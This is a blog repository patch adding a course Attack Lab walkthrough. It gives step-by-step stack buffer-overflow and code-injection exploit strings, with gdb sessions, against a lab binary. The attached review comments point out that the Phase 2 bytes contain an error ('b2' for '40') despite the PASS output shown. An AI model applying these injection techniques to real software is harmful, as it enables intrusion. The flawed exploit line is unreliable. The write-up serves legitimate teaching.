From 97188a509f922d4d70733c903558992488358f62 Mon Sep 17 00:00:00 2001 From: Navan Chauhan Date: Tue, 17 Oct 2023 14:53:15 -0600 Subject: update template --- Content/index.md | 2 +- Content/posts/2023-10-05-attack-lab.md | 297 ++++++++++++++++++- docs/feed.rss | 4 +- docs/index.html | 504 +-------------------------------- templates/index.html | 8 +- 5 files changed, 308 insertions(+), 507 deletions(-) diff --git a/Content/index.md b/Content/index.md index 083fdfe..fb22d38 100644 --- a/Content/index.md +++ b/Content/index.md @@ -1 +1 @@ -# 👋 Hi! +# Navan Chauhan diff --git a/Content/posts/2023-10-05-attack-lab.md b/Content/posts/2023-10-05-attack-lab.md index cfd7bd8..1f87aca 100644 --- a/Content/posts/2023-10-05-attack-lab.md +++ b/Content/posts/2023-10-05-attack-lab.md @@ -1,8 +1,8 @@ --- date: 2023-10-05 20:01 -description: Walkthrough of Attack Lab for CSCI 2400 Computer Systems +description: Walkthrough of Attack Lab Phases 1-3 for CSCI 2400 Computer Systems tags: gdb, reverse-engineering, c++, csci2400, assembly -draft: true +draft: false --- # Attack Lab 
@@ -20,3 +20,296 @@ Again, I like using objdump to disassemble the code. ## Phase 1 From the instructions, we know that our task is to get `CTARGET` to execute the code for `touch1` when `getbuf` executes its return statement, rather than returning to `test` + +Let us try to look into the `getbuf` from our disassembled code. + +``` +0000000000402608 : + 402608: 48 83 ec 18 sub $0x18,%rsp + 40260c: 48 89 e7 mov %rsp,%rdi + 40260f: e8 95 02 00 00 call 4028a9 + 402614: b8 01 00 00 00 mov $0x1,%eax + 402619: 48 83 c4 18 add $0x18,%rsp + 40261d: c3 +``` + +``` +402608: 48 83 ec 18 sub $0x18,%rsp +``` + +We can see that `0x18` (hex) or `24` (decimal) bytes of buffer is allocated to `getbuf` (Since, 24 bytes are being subtracted from the stack pointer). + + +Now, since we know the buffer size we can try passing the address of the touch1 function. + +``` +jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1 +000000000040261e : +``` + +We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check: + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)' +little +``` + +We have our padding size and the function we need to call, we can write it in `ctarget.l1.txt` + +``` +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +1e 26 40 00 00 00 00 00 +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch1!: You called touch1() +Valid solution for level 1 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +## Phase 2 + +> Phase 2 involves injecting a small amount of code as part of your exploit string. 
+ +> Within the file ctarget there is code for a function touch2 having the following C representation: + +```c +void touch2(unsigned val) +{ + vlevel = 2; + if (val == cookie) { + printf("Touch2!: You called touch2(0x%.8x)\n", val); + validate(2); + } else { + printf("Misfire: You called touch2(0x%.8x)\n", val); + fail(2); + } + exit(0); +} +``` + +> Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case, +however, you must make it appear to touch2 as if you have passed your cookie as its argument. + +> Recall that the first argument to a function is passed in register %rdi + +This hint tells us that we need to store the cookie in the rdi register + +``` +movq $0x3e8dee8f,%rdi +retq +``` + +To get the byte representation, we need to compile the code and then disassemble it. + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o +phase2.s: Assembler messages: +phase2.s: Warning: end of file not at end of a line; newline inserted + +phase2.o: file format elf64-x86-64 + + +Disassembly of section .text: + +0000000000000000 <.text>: + 0: 48 c7 c7 8f ee 8d 3e mov $0x3e8dee8f,%rdi + 7: c3 ret +``` + +Thus, the byte representation for our asm code is `48 c7 c7 8f ee 8d 3e c3` + +We also need to figure out the address to the `%rsp` register. Again, looking at the `getbuf` code + +``` +0000000000402608 : + 402608: 48 83 ec 18 sub $0x18,%rsp + 40260c: 48 89 e7 mov %rsp,%rdi + 40260f: e8 95 02 00 00 call 4028a9 + 402614: b8 01 00 00 00 mov $0x1,%eax + 402619: 48 83 c4 18 add $0x18,%rsp + 40261d: c3 ret +``` + +We need to find the address of `%rsp` after calling `` and sending a really long string. 
+ +What we are going to do now is to add a break on `getbuf`, and run the program just after it asks us to enter a string and then find the address of `%rsp` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget +GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 +Copyright (C) 2022 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. +Type "show copying" and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: + . + +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from ./ctarget... +(gdb) b getbuf +Breakpoint 1 at 0x402608: file buf.c, line 12. +(gdb) run +Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget +Cookie: 0x3e8dee8f + +Breakpoint 1, getbuf () at buf.c:12 +12 buf.c: No such file or directory. +(gdb) disas +Dump of assembler code for function getbuf: +=> 0x0000000000402608 <+0>: sub $0x18,%rsp + 0x000000000040260c <+4>: mov %rsp,%rdi + 0x000000000040260f <+7>: call 0x4028a9 + 0x0000000000402614 <+12>: mov $0x1,%eax + 0x0000000000402619 <+17>: add $0x18,%rsp + 0x000000000040261d <+21>: ret +End of assembler dump. 
+(gdb) until *0x402614 +Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe +getbuf () at buf.c:15 +15 in buf.c +(gdb) x/s $rsp +0x55621b40: "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe" +(gdb) +``` + +So, the address for `%rsp` is `0x55621b40` + +Thus, we can set our `ctarget.l2.txt` as: + +``` +byte representation of ASM code +padding +address of %rsp +address of touch2 function +``` + +To get the address of `touch2` we can run: + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2 +000000000040264e : + 402666: 74 2a je 402692 + 4026b2: eb d4 jmp 402688 +``` + +``` +48 c7 c7 8f ee 8d 3e c3 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +40 1b 62 55 00 00 00 00 +4e 26 b2 00 00 00 00 00 +``` + +Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, + +``` +joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch2!: You called touch2(0x3e8dee8f) +Valid solution for level 2 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +## Phase 3 + +> Phase 3 also involves a code injection attack, but passing a string as argument. + +> You will need to include a string representation of your cookie in your exploit string. The string should +consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.” + +> Your injected code should set register %rdi to the address of this string + +> When functions hexmatch and strncmp are called, they push data onto the stack, overwriting +portions of memory that held the buffer used by getbuf. 
As a result, you will need to be careful +where you place the string representation of your cookie. + +Because `hexmatch` and `strncmp` might overwrite the buffer allocated for `getbuf` we will try to store the data after the function `touch3` itself. + +=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex) + +We can use our address for `%rsp` from phase 2, and simply add `0x28` to it. + +=> `0x55621b40` + `0x28` = `0x55621B68` + +Again, let us get the binary representation for the ASM code: + +```asm +movq $0x55621B68, %rdi +retq +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o +phase3.s: Assembler messages: +phase3.s: Warning: end of file not at end of a line; newline inserted + +phase3.o: file format elf64-x86-64 + + +Disassembly of section .text: + +0000000000000000 <.text>: + 0: 48 c7 c7 68 1b 62 55 mov $0x55621b68,%rdi + 7: c3 ret +``` + +Thus, our answer is going to be in the form: + +``` +asm code +padding +return address / %rsp +touch3 address +cookie string +``` + +To quickly get the address for `touch3` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3 +0000000000402763 : + 402781: 74 2d je 4027b0 + 4027d3: eb d1 jmp 4027a6 +``` + +We need to use an ASCII to Hex converter to convert the cookie string into hex. 
+ +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p +3365386465653866 +``` + +Thus, our cookie string representation is `33 65 38 64 65 65 38 66` + +``` +48 c7 c7 68 1B 62 55 c3 +00 00 00 00 00 00 00 00 +00 00 00 00 00 00 00 00 +40 1b 62 55 00 00 00 00 +63 27 40 00 00 00 00 00 +33 65 38 64 65 65 38 66 +``` + +``` +jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget +Cookie: 0x3e8dee8f +Type string:Touch3!: You called touch3("3e8dee8f") +Valid solution for level 3 with target ctarget +PASS: Sent exploit string to server to be validated. +NICE JOB! +``` + +Phases 1-3 Complete. diff --git a/docs/feed.rss b/docs/feed.rss index 15b5cd7..90fcf9c 100644 --- a/docs/feed.rss +++ b/docs/feed.rss @@ -4,8 +4,8 @@ Navan's Archive Rare Tips, Tricks and Posts https://web.navan.dev/en - Tue, 17 Oct 2023 02:50:51 -0000 - Tue, 17 Oct 2023 02:50:51 -0000 + Tue, 17 Oct 2023 11:59:32 -0000 + Tue, 17 Oct 2023 11:59:32 -0000 250 diff --git a/docs/index.html b/docs/index.html index 2a900d6..3f01c4f 100644 --- a/docs/index.html +++ b/docs/index.html @@ -42,9 +42,10 @@
-

👋 Hi!

+

Navan Chauhan

+

Recent Posts

-
  • A new method to blog
  • -
      -
    • Writing posts in markdown using pen and paper
    • -
    • Published On: 2022-11-07 23:29
    • -
    • Tags: - - Python, - - OCR, - - Microsoft Azure - -
    - - -
  • Why You No Host?
  • -
      -
    • Why you should self-host with YunoHost
    • -
    • Published On: 2022-08-05 14:46
    • -
    • Tags: - - Self-Hosted, - - YunoHost - -
    - - -
  • Building a Similar Movies Recommendation System
  • -
      -
    • Building a Content Based Similar Movies Recommendatiom System
    • -
    • Published On: 2022-05-21 17:56
    • -
    • Tags: - - Python, - - Transformers, - - Recommendation-System - -
    - - -
  • Making a Crude ML Powered Chatbot in Swift using CoreML
  • -
      -
    • Writing a simple Machine-Learning powered Chatbot (or, daresay virtual personal assistant ) in Swift using CoreML.
    • -
    • Published On: 2021-06-27 23:26
    • -
    • Tags: - - Swift, - - CoreML, - - NLP - -
    - - -
  • Cheminformatics on the Web (2021)
  • -
      -
    • Summarising Cheminformatics on the web in 2021.
    • -
    • Published On: 2021-06-26 13:04
    • -
    • Tags: - - Cheminformatics, - - JavaScript - -
    - - -
  • Basic NFC Music Cards for iOS
  • -
      -
    • Basic NFC Music Cards on iOS with Shortcuts
    • -
    • Published On: 2021-06-25 16:20
    • -
    • Tags: - - iOS, - - Shortcuts, - - Fun - -
    - - -
  • Posting Blog Posts as Twitter Threads Part 1/n
  • -
      -
    • Converting Posts to Twitter Threads
    • -
    • Published On: 2021-06-25 00:08
    • -
    • Tags: - - Python, - - Twitter, - - Eh - -
    - - -
  • RSS Feed written in HTML + JavaScript
  • -
      -
    • Short code-snippet for an RSS feed, written in HTML and JavaScript
    • -
    • Published On: 2020-12-01 20:52
    • -
    • Tags: - - Tutorial, - - Code-Snippet, - - HTML, - - JavaScript - -
    - - -
  • Generating HTTPS Certificate using DNS a Challenge through Let's Encrypt
  • -
      -
    • Short code-snippet to generate HTTPS certificates using the DNS Challenge through Lets Encrypt for a web-server using DuckDNS.
    • -
    • Published On: 2020-11-17 15:04
    • -
    • Tags: - - Tutorial, - - Code-Snippet, - - Web-Development - -
    - - -
  • Trying Different Camera Setups
  • -
      -
    • Comparison of different cameras setups for using as a webcam and tutorials for the same.
    • -
    • Published On: 2020-10-11 16:12
    • -
    • Tags: - - Tutorial, - - Review, - - Webcam - -
    - - -
  • Introduction to AR.js and Natural Feature Tracking
  • -
      -
    • An introduction to AR.js and NFT
    • -
    • Published On: 2020-08-01 15:43
    • -
    • Tags: - - Tutorial, - - AR.js, - - JavaScript, - - Augmented-Reality - -
    - - -
  • Installing RDKit on Google Colab
  • -
      -
    • Install RDKit on Google Colab with one code snippet.
    • -
    • Published On: 2020-07-01 14:23
    • -
    • Tags: - - Tutorial, - - Code-Snippet, - - Colab - -
    - - -
  • Compiling AutoDock Vina on iOS
  • -
      -
    • Compiling AutoDock Vina on iOS
    • -
    • Published On: 2020-06-02 23:23
    • -
    • Tags: - - iOS, - - Jailbreak, - - Cheminformatics, - - AutoDock Vina, - - Molecular-Docking - -
    - - -
  • Workflow for Lightning Fast Molecular Docking Part One
  • -
      -
    • This is my workflow for lightning fast molecular docking.
    • -
    • Published On: 2020-06-01 13:10
    • -
    • Tags: - - Code-Snippet, - - Molecular-Docking, - - Cheminformatics, - - Open-Babel, - - AutoDock Vina - -
    - - -
  • Compiling Open Babel on iOS
  • -
      -
    • Compiling Open Babel on iOS
    • -
    • Published On: 2020-05-31 23:30
    • -
    • Tags: - - iOS, - - Jailbreak, - - Cheminformatics, - - Open-Babel - -
    - - -
  • Fixing X11 Error on macOS Catalina for AmberTools 18/19
  • -
      -
    • Fixing Could not find the X11 libraries; you may need to edit config.h, AmberTools macOS Catalina
    • -
    • Published On: 2020-04-13 11:41
    • -
    • Tags: - - Molecular-Dynamics, - - macOS - -
    - - -
  • Possible Drug Candidates for COVID-19
  • -
      -
    • COVID-19, has been officially labeled as a pandemic by the World Health Organisation. This paper presents cloperastine and vigabatrin as two possible drug candidates for combatting the disease along with the process by which they were discovered.
    • -
    • Published On: 2020-03-17 17:40
    • -
    • Tags: - - publication, - - pre-print - -
    - - -
  • Is it possible to programmatically generate Vaporwave?
  • -
      -
    • This paper is about programmaticaly generating Vaporwave.
    • -
    • Published On: 2020-03-14 22:23
    • -
    • Tags: - - publication, - - pre-print - -
    - - -
  • Making My First Vaporwave Track (Remix)
  • -
      -
    • I made my first vaporwave remix
    • -
    • Published On: 2020-03-08 23:17
    • -
    • Tags: - - Vaporwave, - - Music - -
    - - -
  • Tinkering with an Android TV
  • -
      -
    • Tinkering with an Android TV
    • -
    • Published On: 2020-03-03 18:37
    • -
    • Tags: - - Android-TV, - - Android - -
    - - -
  • How to setup Bluetooth on a Raspberry Pi
  • -
      -
    • Connecting to Bluetooth Devices using terminal, tested on Raspberry Pi Zero W
    • -
    • Published On: 2020-01-19 15:27
    • -
    • Tags: - - Code-Snippet, - - tutorial, - - Raspberry-Pi, - - Linux - -
    - - -
  • Creating a Custom Image Classifier using Turicreate to detect Smoke and Fire
  • -
      -
    • Tutorial on creating a custom Image Classifier using Turicreate and a dataset from Kaggle
    • -
    • Published On: 2020-01-16 10:36
    • -
    • Tags: - - Tutorial, - - Colab, - - Turicreate - -
    - - -
  • Setting up Kaggle to use with Google Colab
  • -
      -
    • Tutorial on setting up kaggle, to use with Google Colab
    • -
    • Published On: 2020-01-15 23:36
    • -
    • Tags: - - Tutorial, - - Colab, - - Turicreate, - - Kaggle - -
    - - -
  • Converting between image and NumPy array
  • -
      -
    • Short code snippet for converting between PIL image and NumPy arrays.
    • -
    • Published On: 2020-01-14 00:10
    • -
    • Tags: - - Code-Snippet, - - Tutorial - -
    - - -
  • Building a Fake News Detector with Turicreate
  • -
      -
    • In this tutorial we will build a fake news detecting app from scratch, using Turicreate for the machine learning model and SwiftUI for building the app
    • -
    • Published On: 2019-12-22 11:10
    • -
    • Tags: - - Tutorial, - - Colab, - - SwiftUI, - - Turicreate - -
    - - -
  • Polynomial Regression Using TensorFlow
  • -
      -
    • Polynomial regression using TensorFlow
    • -
    • Published On: 2019-12-16 14:16
    • -
    • Tags: - - Tutorial, - - Tensorflow, - - Colab - -
    - - -
  • Making Predictions using Image Classifier (TensorFlow)
  • -
      -
    • Making predictions for image classification models built using TensorFlow
    • -
    • Published On: 2019-12-10 11:10
    • -
    • Tags: - - Tutorial, - - Tensorflow, - - Code-Snippet - -
    - - -
  • Creating a Custom Image Classifier using Tensorflow 2.x and Keras for Detecting Malaria
  • -
      -
    • Tutorial on creating an image classifier model using TensorFlow which detects malaria
    • -
    • Published On: 2019-12-08 14:16
    • -
    • Tags: - - Tutorial, - - Tensorflow, - - Colab - -
    - - -
  • Splitting ZIPs into Multiple Parts
  • -
      -
    • Short code snippet for splitting zips.
    • -
    • Published On: 2019-12-08 13:27
    • -
    • Tags: - - Code-Snippet, - - Tutorial - -
    - - -
  • Image Classifier With Teachable Machines
  • -
      -
    • Tutorial on creating a custom image classifier quickly with Google Teachable Machines
    • -
    • Published On: 2019-12-04 18:23
    • -
    • Tags: - - Tutorial - -
    - - -
  • Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response
  • -
      -
    • This paper is about Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response.
    • -
    • Published On: 2019-05-14 02:42
    • -
    • Tags: - - publication - -
    - - -
  • Creating your own custom theme for Snowboard or Anemone
  • -
      -
    • Tutorial on creating your own custom theme for Snowboard or Anemone
    • -
    • Published On: 2019-05-05 12:34
    • -
    • Tags: - - Tutorial, - - Jailbreak, - - Designing, - - Snowboard, - - Anemone - -
    - - -
  • Hello World
  • -
      -
    • My first post.
    • -
    • Published On: 2019-04-16 17:39
    • -
    • Tags: - - hello-world - -
    - - -
  • Experiments
  • -
      -
    • Just a markdown file for all experiments related to the website
    • -
    • Published On: 2010-01-24 23:43
    • -
    • Tags: - - Experiment - -
    + +For all posts go to Posts -
    diff --git a/templates/index.html b/templates/index.html index a651ea2..a83e6c3 100644 --- a/templates/index.html +++ b/templates/index.html @@ -6,8 +6,9 @@
    {{ content}} +

    Recent Posts

      -{% for post in posts %} +{% for post in posts[:5] %}
    • {{ post.title }}
      • {{ post.description}}
      • @@ -20,5 +21,8 @@ {% endfor %}
      + +For all posts go to Posts +
    -{% endblock %} \ No newline at end of file +{% endblock %} -- cgit v1.2.3
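Review bot: in the Phase 2 `ctarget.l2.txt` block of the Content/posts/2023-10-05-attack-lab.md hunk, the last line `4e 26 b2 00 00 00 00 00` does not agree with the `touch2` address shown two blocks earlier (`000000000040264e`); in little-endian order that address is `4e 26 40 00 00 00 00 00`, so the `b2` (which looks copied from the `4026b2` jmp line of the grep output) should be `40`. Two smaller points in the same hunk: the symbol names after the addresses in the disassembly listings are missing (`0000000000402608 :`, `call 4028a9`, and the sentence "after calling `` and sending a really long string" has an empty code span), which is what happens when `<getbuf>`-style labels are left unescaped in markdown and get treated as HTML tags; check the source file and escape or fence them so the names survive. Also, "figure out the address to the `%rsp` register" and "find the address of `%rsp`" would read more accurately as "the value held in `%rsp`", since what is pasted into the exploit string is the stack pointer value (the start of the buffer), not an address of the register.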
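Review bot: `{% for post in posts[:5] %}` in the templates/index.html hunk only yields the five most recent posts if `posts` is already sorted newest-first when it reaches the template; the regenerated docs/index.html in this patch does list posts in descending date order, so that sort presumably happens upstream, but nothing in the template records that assumption. A one-line comment above the loop, or sorting in the template itself (e.g. `posts|sort(attribute='date', reverse=true)` if this is Jinja2), would keep the truncation correct if the generator ever changes the list order. Consider also lifting the literal `5` into a named variable so the limit is discoverable next to the "For all posts go to Posts" link it pairs with.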